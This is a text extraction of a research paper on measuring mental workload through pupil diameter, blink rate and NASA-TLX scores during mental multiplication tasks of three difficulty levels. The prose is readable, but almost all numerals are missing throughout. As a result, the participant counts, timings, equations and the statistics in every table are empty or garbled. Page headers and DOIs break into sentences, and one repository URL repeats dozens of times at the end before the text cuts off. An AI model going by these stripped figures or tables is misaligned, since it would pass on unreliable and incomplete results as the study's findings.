ahern, , and in klingner, ) and trials ( , , , , and , respectively), and a higher measurement frequency ( hz, hz, and hz, respectively), the present study aimed to obtain the teprs for three levels of difficulty of mental multiplications. we report the mean pupil diameter change (mpdc) with respect to the baseline pupil diameter right before the presentation of the multiplicand, as was also done by ahern ( ) and klingner ( ). in addition, we report the absolute mean pupil diameter (mpd). laeng, sirois & gredebäck ( ) explained that pupil diameter responses exhibit both a phasic component (i.e., ‘rapid’ responses to task-relevant events) as well as a tonic component (i.e., ‘slow’ changes in the baseline pupil diameter). the mpdc allowed us to assess the tepr, while the mpd allowed us to determine whether the baseline itself differed as a function of the difficulty of the multiplications. furthermore, in our study, the mean pupil diameter change rate (mpdcr), a measure introduced by palinko et al. ( ), was examined. the mpdcr is the discrete-time equivalent to the first derivative of the pupil diameter and may be useful for assessing moment-to-moment changes in mental workload. while ahern ( ) and klingner ( ) statistically compared the maximum dilation and mean dilation between the difficulty levels of the mental multiplications, we applied a more fine-grained approach where the mpdc, mpd, and mpdcr were subjected to a statistical test for each . s time interval in the calculation period. another way in which our research differs from the works of ahern ( ) and klingner ( ) is that we included two additional measures of mental workload. first, we compared the effect sizes of the pupil diameter measures with those obtained with a classic subjective measurement method of workload, the nasa-tlx. second, we assessed the mean blink rate (mbr). the relation between mental workload and blink rate has been unclear (kramer, ; recarte et al., ; marquart, cabrall & de winter, ), and our aim was to clarify this relationship. the numbers in our study were presented visually in order to gain temporal consistency, as was also done by klingner ( ; cf. ahern, , in which the numbers were presented aurally). furthermore, as in klingner ( ), the pupil diameter was recorded with an automatic remote eye tracker (smarteye dr ). method ethics statement the research was approved by the human research ethics committee (hrec) of the delft university of technology (tu delft ‘workload assessment for mental arithmetic tasks marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure experimental equipment: monitor with built-in eye tracker (smarteye dr ), chin-rest, and keyboard. using the task-evoked pupillary response: january , ). all participants provided written informed consent. participants thirty participants ( women and men), aged between and years (m = , sd = . years) were recruited to volunteer in this experiment ( bsc/msc students and persons with an msc degree). individuals wearing glasses or lenses were excluded from participation. all participants read and signed an informed consent form, explaining the purpose and procedures of the experiment and received e compensation for their time. equipment the smarteye dr remote eye tracker, with a sampling rate of hz, was used to record the participant’s pupil diameter, eyelid opening, and gaze direction while sitting behind a desktop computer (see fig. ). the pupil diameter was the average of the left and right pupil diameter, as provided by the smarteye . software. the software estimates the pupil diameter as the major axis of an ellipse that is fit to the edge of the pupil. in order to obtain more accurate measurements, a chin-rest was used. the eye tracker was equipped with a -inch screen, which was positioned approximately cm in front of the sitting participant and which was used to display task-relevant information. the outcome of a task had to be entered using the numeric keypad of a keyboard (cf. ahern, in which participants used a keyboard, and klingner, in which participants used a touchscreen). the experiment took place in a room where there was office lighting delivered by standard fluorescent lamps and where daylight could not enter. our approach to room illumination was similar to that used by klingner ( ). we acknowledge that a stricter marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure task display during accommodation, pause, and calculation period. control of lighting is possible. for example, janisse ( ) reported that he ensured constant illumination of his experimental lab by feeding all electric current used in the room through a constant voltage transformer. no such strict control of illumination was applied in our research nor did we measure the degree of ambient lighting. however, because the experimental conditions were counterbalanced, we reasoned that there could be no systematic effect of ambient lighting on our results. furthermore, we used a screen background with variable brightness, designed to minimize the pupillary light reflex in case a participant looked away from the center of the screen (fig. ; marquart, ). the corresponding image file is available in supplemental information. procedure the participants were requested to perform trials of mental arithmetic tasks (multipli- cations of two numbers), five of which were used as a short training. the remaining trials were presented in three sessions of different levels of difficulty (easy, medium, and hard; see table s ). level contained the easiest multiplications (outcomes ranging between and ), level contained multiplications of intermediate difficulty (outcomes between and ), and level contained the hardest multiplications (outcomes between and ). the sequence of the three sessions was counterbalanced across the participants. each trial was initiated by the participant by pressing the enter key and started with a s accommodation period, followed by a s visual presentation of two numbers (multiplicand and multiplier) between and , with a . s pause in between (table ). the participants were asked to multiply the two numbers and type their answer on the numeric keypad s after the multiplier disappeared. thus, the total duration of one trial marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table timeline of an individual trial. period start time (s) end time (s) symbol accommodation . . xx baseline . . xx multiplicand . . pause . . xx multiplier . . calculation . . xx response . when pressing enter key n/a was . s ( + + . + + ). when the numbers were not presented, a double “x” was shown to avoid pupillary reflexes caused by changes in brightness or contrast. after each of the three sessions, participants were asked to fill out a nasa-tlx questionnaire to assess their subjective workload on six facets: mental demand, physical demand, temporal demand, performance, effort, and frustration (hart & staveland, ). all questions were answered on a scale from % (very low) to % (very high). for the performance question, % meant perfect and % was failure. the participants’ overall subjective workload was obtained by averaging the scores across the six items. the total duration of the experiment was approximately min. instructions to participants before the experiment started, the participants were informed that they had to do mul- tiplications, five of which would be used as a short training. they were also told that the re- maining trials were presented in three sessions of varying difficulty (easy, medium, and hard). the participants were requested to position themselves in front of the monitor with their chin leaning on the chin-rest. they were instructed to stay still, keep their gaze fixed, focus (not stare) at the center of the screen throughout a trial. in addition, participants were asked to blink as little as possible, obviously without causing irritation, and to start each trial with ‘a clear mind’ (i.e., not thinking about the previous trial). if the participants could not complete the multiplication, they were instructed to enter zero as their answer. data processing the data were processed in two steps. in the first step, the missing values in the pupil diameter data (lost during recording) were removed and the signals were repaired with linear interpolation (see fig. a, for an illustration). on average, . % of the data were lost, so this processing step did not substantially influence the results. in the second step, blinks and poor-quality data were removed. during a blink, the eyelid opening rapidly diminishes and then increases in a few tenths of a second until it is fully open again. it is impossible to track the pupil diameter while blinking. the pupil diameter quality signal (provided by the smarteye software) was used to filter out the poor quality data. this signal ranges from to , with values close to indicating a good quality (smarteye, ). all data points with a pupil diameter quality below . were removed. trials containing less than % of the data were excluded from the analysis. of the initial , trials from participants, , marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of data processing. (a) pupil diameter (pd) before and after linear interpolation for missing values. (b) pupil diameter before and after linear interpolation for poor-quality data. trials passed these criteria ( for level , for level , & for level ; the entire level session of one participant [ trials] was discarded). the gaps in the , trials were filled using linear interpolation (fig. b). the last . s of the accommodation period was defined as the pupillary baseline, as was done by klingner ( ). the mean pupil diameter of the baseline period ( . – . s) of each trial was subtracted from each trial to accommodate for any possible shifts or drifts. the mean pupil diameter change (mpdc) for each participant was then obtained by averaging all trials per level of difficulty. similarly, the mean pupil diameter (mpd) for each participant was obtained but then without subtracting the mean pupil diameter of the baseline period. the mpdcr was calculated for each participant as the average velocity (mm/s) or change in mpd between two points in time. in order to compare the three difficulty levels, the mpd and mpdc were analyzed at eight fixed points in time from the multiplier and calculation periods (i.e., p = . s, p = . s, p = . s, p = . s, p = . s, p = . s, p = . s, p = . s). the mpdcr was assessed across the seven interim periods. in addition to these analyses, the mean blink rate (mbr) for two different periods in time was calculated. that is, a distinction was made between low mental demands (i.e., from the beginning of the accommodation period until the presentation of the multiplier; i.e., from to . s) and high mental demands (i.e., from the presentation of the multiplier until the end of the calculation period; i.e., from . to . s). a blink was defined as the moment that the eye opening dropped below % of the mean eyelid opening of that trial (see fig. s ). statistical analyses the pupil diameter measures (mpd, mpdc, and mpdcr), the blink rates (mbr), and the results of the nasa-tlx were analyzed with paired t-tests between the three levels marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. m u lti p lic a n d m u lti p lie r ( ) ( ) ( ) ( ) ( ) ( ) ( ) time (s) m p d ( m m ) . . . . . . . level level level p p p p p p p p figure mean pupil diameter (mpd) during the mental multiplication task for the three levels of difficulty. the grey bars represent the periods where the multiplicand and multiplier were shown on the screen. the numbers were masked by an “xx” during the remainder of the trial. (i.e., level vs. , level vs. , and level vs. ). additionally, pearson’s r correlation coefficients were obtained between the mpdc, the nasa-tlx, and the percentage of incorrect responses. for all analyses, a bonferroni correction was applied. accordingly, we set the significance level to . / (∼ . ). cohen’s dz effect size (see eq. ( )) was calculated to determine at which points in time the differences in mpdc between the three levels of difficulty were largest. in eq. ( ), m and sd are the mean and standard deviation of the vector of data points, respectively, r is the pearson correlation coefficient between the two vectors of data points, t is the t-statistic of a paired t-test, and n is the sample size (i.e., the number of pairs, which was either or ). dz = mi − mj sd i + sd j − ∗ r ∗ sdi ∗ sdj = t √ n . ( ) results mean pupil diameter (mpd) the mpd during the mental multiplication task is shown in fig. . it can be seen that at all points in time, the mpd was higher for the higher levels of difficulty. the pattern of the mpd was similar for all levels during the first ten seconds. figure also shows the results for the period . – . s, split into seven periods with eight points. the means and standard deviations of the mpd for the eight points in time and the three levels of difficulty are shown in table , together with the effect sizes (dz ) and the p-values of the pairwise comparisons. the results confirm that the mpd was significantly higher for the more difficult levels at all points in time. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table mean pupil diameter (mpd), mean pupil diameter change (mpdc), mean pupil diameter change rate (mpdcr), nasa-tlx, and mean blink rate (mbr), per level of difficulty of the multiplications. the means (m) and standard deviations (sd) are shown per level of difficulty of the multiplications. p –p refers to the eight points in time, while ( )–( ) refers to the seven periods. statistically significant differences are indicated in boldface. n = for the nasa-tlx for all three levels. m(sd) p-value (dz ) level (n = ) level (n = ) level (n = ) level vs. (df = ) level vs. (df = ) level vs. (df = ) mpd (mm) p . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) mpdc (mm) p − . ( . ) − . ( . ) − . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) − . ( . ) − . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p − . ( . ) − . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p − . ( . ) − . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) p − . ( . ) − . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) mpdcr (mm/s) ( ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) ( ) . ( . ) . ( . ) . ( . ) . ( . ) . (− . ) . (− . ) ( ) − . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) ( ) − . ( . ) − . ( . ) . ( . ) . ( . ) < . ( . ) < . ( . ) ( ) − . ( . ) − . ( . ) − . ( . ) . ( . ) . ( . ) . ( . ) ( ) − . ( . ) − . ( . ) . ( . ) . (− . ) . ( . ) < . ( . ) ( ) − . ( . ) − . ( . ) − . ( . ) . (− . ) . ( . ) . ( . ) nasa-tlx (%) total ( ) ( ) ( ) < . ( . ) < . ( . ) < . ( . ) mental ( ) ( ) ( ) . ( . ) < . ( . ) < . ( . ) physical ( ) ( ) ( ) . ( . ) . ( . ) . ( . ) temporal ( ) ( ) ( ) . ( . ) < . ( . ) < . ( . ) performance ( ) ( ) ( ) . ( . ) < . ( . ) < . ( . ) effort ( ) ( ) ( ) < . ( . ) < . ( . ) < . ( . ) frustration ( ) ( ) ( ) . ( . ) < . ( . ) < . ( . ) mbr (blinks/s) ( . – . s) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) ( . – . s) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure mean pupil diameter change (mpdc) during the mental multiplication task, for the three levels of difficulty. the grey bars represent the periods where the multiplicand and multiplier were shown on the screen. the numbers were masked by an “xx” during the remainder of the trial. mean pupil diameter change (mpdc) figure shows the mpdc as a function of the level of difficulty. as mentioned above, this measure takes into account the shift of the baseline by subtracting the mean of the baseline period of each trial. the difference between the three pupillary responses during the calculation period can now be seen more clearly as compared to the mpd. again, the multiplier and calculation periods were split into seven periods by eight points. the results of the analysis of the mpdc at the eight points in time and the three levels of difficulty are shown in table . a significant difference occurred at points – . the effect size estimate cohen’s dz was also calculated for the mpdc between pairs of difficulty levels for each point in time (see fig. ). it can be seen that large effect sizes arose after approximately s since the start of the trial, especially between levels and . mean pupil diameter change rate (mpdcr) figure shows the mpdcr as a function of the difficulty level for the seven periods. a positive value indicates overall pupil dilation during that period and a negative value means overall contraction of the pupil diameter. in the first two periods, the diameter increased with approximately equal velocity for the three levels. during the other periods, the velocities decreased and became negative. significant differences were found between the three conditions (see also table ). self-reported workload (nasa-tlx) the results of the nasa-tlx questionnaire are shown in fig. . for almost all items, the tlx score was significantly higher for the more difficult multiplications (see also table ). only the subjective physical workload did not differ significantly between the levels of difficulty. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure cohen’s dz for the mean pupil diameter change (mpdc) between pairs of levels of diffi- culty. the grey bars represent the periods where the multiplicand and multiplier were shown on the screen. the numbers were masked by an “xx” during the remainder of the trial. figure mean pupil diameter change rate (mpdcr), for the three levels of difficulty and for seven periods in time during the presentation of the multiplier and the calculation period. the asterisks indicate statistically significant differences between the levels of difficulty. pupil diameter of correct versus incorrect responses the percentages of correct responses for levels , , and were respectively . %, . %, and . % when selecting all trials per level. when considering only those trials which passed the data filtering (see section ‘data processing’), the percentages of correct responses for levels , , and were respectively . % ( of trials), . % ( of trials), and . % ( of trials). figure shows the mpd for level separated into correct and incorrect responses. too few incorrect answers were given for marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure results of the nasa-tlx questionnaire, for the three levels of difficulty. the asterisks indicate statistically significant differences between the levels of difficulty. figure mean pupil diameter (mpd) during the mental multiplication task for the third level of difficulty. a distinction is made between correct and incorrect responses. the grey bars represent the periods where the multiplicand and multiplier were shown on the screen. the numbers were masked by an “xx” during the remainder of the trial. the other two levels and the results for these levels are therefore not reported. there were no significant differences between the mpd for correct and incorrect responses (table s ). blink rate table shows that the mbr of level was higher, but not significantly so, than the mbr of levels and . however, for each level of difficulty, the mbr was higher during periods with low mental demands ( – . s) than during higher mental demands ( . – . s). figure illustrates the cumulative number of blinks as a function of time. it can be seen marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure mean cumulative number of blinks during the mental multiplication task for the three levels of difficulty. that participants were likely to blink at distinct moments in time, namely right after the start of the trial (∼ . s), right after the presentation of the multiplicand (∼ . s), and after the presentation of the multiplier (∼ . s). correlations between mpdc, nasa-tlx, and proportion of incorrect responses the results of the correlation analyses between the mpdc, nasa-tlx, and proportion of incorrect responses are shown in table . for the mpdc and nasa-tlx, the table shows overall positive correlations, for the eight points in time and for the three different levels of difficulty. between the mpdc and the percentage of incorrect responses, three statistically significant positive correlation coefficients were observed at points and . furthermore, table shows that people who experienced higher subjective workload (i.e., a higher nasa-tlx score) generally gave more incorrect responses. discussion pupil diameter results the results showed that the mpd was higher for the higher levels of difficulty at all eight points of the calculation period, with points and exhibiting the largest differences. the mpd findings demonstrate that the baseline of the pupil diameter can shift during mental activity. if the pupil had been given more time to recover from the previous trial by increasing the length of the accommodation period, the difference of the mpd between the three levels of difficulty in the first period would probably have been smaller. a remarkable finding is the behavior of the mpd during the first . s of the accommodation period. where a clear decline from the start or a horizontal line might be expected, the mpd starts to decline only after about . s. this unexpected finding may have been caused by the fact that participants looked away from the center of the marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table pearson’s correlations (r) between the mean pupil diameter change (mpdc), percentage of incorrect responses, and the overall nasa-tlx scores, for the three levels of difficulty. statistically significant correlations are indicated in boldface. level level level mean of levels – r (p-value) r (p-value) r (p-value) r (p-value) mpdc vs. overall nasa-tlx p − . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) − . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) . ( . ) . ( . ) . ( . ) mpdc vs. % incorrect responses p . ( . ) . ( . ) . ( . ) . (< . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) p − . ( . ) . ( . ) . ( . ) . ( . ) p . ( . ) . ( . ) . ( . ) . ( . ) overall nasa-tlx vs. % incorrect responses . ( . ) . ( . ) . ( . ) . (< . ) screen when their outcome to the multiplication had to be entered. although the responses were not given during the accommodation period, the fluctuation could be an aftereffect because the trials came in relatively quick succession. during the presentation of the multiplicand and the pause ( – . s) the mpd decreased further, at a slower pace however, which seems to indicate memory load (cf. kahneman & beatty, ). a small increase of the pupil diameter after the presentation of the first number was observed by ahern ( ) and klingner ( ). the mpdc has the advantage compared to mpd that it corrects for fluctuations in the baseline pupil diameter, and hence compensates for any structural temporal trends that might exist. the use of mpdc is appropriate as compared to other types of measures such as percent dilation, because as pointed out by beatty & lucero-wagoner ( ), “the extent of the pupillary dilation evoked by cognitive processing is independent of baseline pupillary diameter over a wide range of baseline values.” (p. ). what is notable in the mpdc results (fig. ) is that the pupillary behavior between the three difficulty levels was highly similar during the first few seconds after the presentation of the multiplier ( . – s). this might be due to the strategy that the participants used. one can imagine that the first step in each multiplication, regardless of its difficulty, is similar. for example, the marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. first step for many people of the level multiplication × would probably be × . this is comparable to the first step of the level multiplication × , which would then be × . these observations are in line with the teprs obtained by ahern ( ), who found a similar response between the three levels of difficulty at the beginning of the calculation. the mpdc during the other periods was found to differ significantly between the three levels, particularly when levels and were compared to level . the results of the mpdcr illustrate that the effect sizes are smaller when compared to the results of the mpdc measure. presumably, the mpdcr is less sensitive to changes in mental workload because it represents second-to-second changes in pupil diameter rather than the actual pupil diameter itself (either absolutely as in the mpd, or relative to a baseline as in the mpdc). as with any first-order derivative of a signal, the mpdcr might be more sensitive to noise and unsystematic moment-to-moment fluctuations in pupil diameter. nonetheless, the mpdcr does provide a clear indication of when the muscles of the pupil respond, and hence when the mental workload increases or decreases. an interesting question related to fig. showing the trials with the correct versus incorrect responses is: were the participants really trying to complete the task or did they give up on the task because it was too difficult? if the latter were the case, one would expect an early decline of the mpd. but the opposite is true, instead. a small increase of the mpd was measured, suggesting that the participants were trying hard to complete the task until the time was up. self-reported workload (nasa-tlx) according to the results of the nasa-tlx questionnaire, the classification of the arithmetic tasks was done properly, since a statistically significant difference was found in the subjective mental workload across all three levels. the large contrast between the subjective mental and physical workload underlines that the task was predominantly mentally rather than physically demanding. not to be overlooked are the roles of the subjective temporal demand and frustration. looking at the increase of the mpd of the incorrect responses after s for level (fig. ), it is plausible that, although the results were not statistically significant, this increase was caused by the time pressure of the task or the anxiety or frustration of not having solved the multiplication yet, instead of increased task demands. blink rate the relation between mental workload and blink rate has been unclear in the literature (e.g., kramer, ; marquart, cabrall & de winter, ; recarte et al., ). the results in the present study show that the mbr was slightly higher for level than for levels and . contrastingly, the mbr was higher during the low mental demand period ( – . s) than during the high demand period ( . – . ). the temporal analysis (fig. ) indicated that people blinked particularly at those moments when the visual demand was reduced, such as right after the start of the task and right after the presentation of the multiplier. in summary, consistent with prior research, the relationship between mental workload marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and blink rate is complex, and it appears that blink rate is governed not only by mental demands, but also by visual demands (see also marquart, cabrall & de winter, ). correlations between mpdc, nasa-tlx, and proportion of incorrect responses moderate to strong correlations were found between the mpdc and the proportion of incorrect responses. a similar but weaker effect was obtained between the mpdc and the nasa-tlx. thus, the mpdc was higher for participants who gave more incorrect responses and who reported a higher workload in the nasa-tlx. negative correlations between the pupil diameter and the proportion of correct responses were also found by ahern ( ), payne, parry & harasymiw ( ) and recarte et al. ( ). these findings could be useful for determining the feasibility of using the pupil diameter in human-machine applications such as adaptive automation, which is “an approach to automation design where tasks are dynamically allocated between the human operator and computer systems” (byrne & parasuraman, , p. ). conclusions and recommendations it is concluded that the results of ahern ( ) and klingner ( ) have been accurately replicated with the smarteye dr remote eye tracker. the cohen dz effect size between the mpdc of level and level was . at maximum (at point ), which was about the same (dz = . ) as for the nasa-tlx overall score. this finding demonstrates that pupil diameter measurements can be just as valid as the nasa-tlx. in our research, an attempt was made to provide more insight into the individual differences of teprs by means of a correlation analysis. results showed a few moderate to strong correlations at the beginning of the calculation period between the mpdc and the nasa-tlx, on the one hand, and the percentage of incorrect responses, on the other. thus, it seems possible to assess workload by tracking the pupil diameter. however, the validity of pupil diameter measurements may need improvement before it could be implemented in practice. future research could focus on improving signal analysis techniques that filter out effects other than mental workload, such as the light reflex. it is challenging to enhance the applicability of pupillometry towards tasks that require fixation on different types of targets. janisse ( ) previously concluded that research that uses pictorial stimuli should “be interpreted with caution, and perhaps be discounted.” (p. ). one possible way to use the pupil diameter in visually complex tasks might be to correct in real time for the amount of light that enters the eye. janisse proposed such approach as early as : “the simultaneous monitoring of pupil size and eye movements (points of focus) as subjects view pictorial stimuli might allow one to mathematically ‘correct’ pupil size as a function of the brightness of the point on which the subject’s gaze is falling at a given time.” (p. ). because modern remote eye trackers measure gaze direction and pupil diameter simultaneously, such approach becomes within practical reach, as also discussed by klingner ( ). for further reading into approaches of pupillometry in complex visual environments, see palinko & kun ( ; a driving simulator), and klingner ( ; visual search and map reading). marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. additionally, validity could be improved by combining pupillometry with other physiological measures (e.g., haapalainen et al., ; just, carpenter & miyake, ; kahneman et al., ; satterthwaite et al., ; van der molen et al., ). for example, haapalainen et al. ( ) used an electrocardiogram (ecg)-enabled armband, a remote eye tracker, and a wireless electroencephalogram (eeg) headset, to collect various physiological signals simultaneously. the authors concluded that the heat flux and heart rate variability in combination provided a classification accuracy of over % between conditions of low and high mental workload. in this study, the pupil diameter did not perform strongly as a classifier ( %), presumably due to data loss of the eye tracker. a primary advantage of pupillometry in such multivariate applications is that the pupil diameter reacts rapidly to changes in task conditions (cf. fig. ), while measures such as heat flux, galvanic skin response, or heart rate have considerably longer time constants. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • gerhard marquart conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • joost de winter conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the research was approved by the human research ethics committee (hrec) of the delft university of technology (tu delft). (‘workload assessment for mental arithmetic tasks using the task-evoked pupillary response: january , ). data availability the following information was supplied regarding the deposition of related data: the experimenter software and analysis scripts are available as supplemental files but as the raw data files are quite large, they are currently hosted at: http://repository.tudelft.nl/ assets/uuid:c edcab- - cd -b - eb bab /supplementary material gerhard marquart.zip. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab 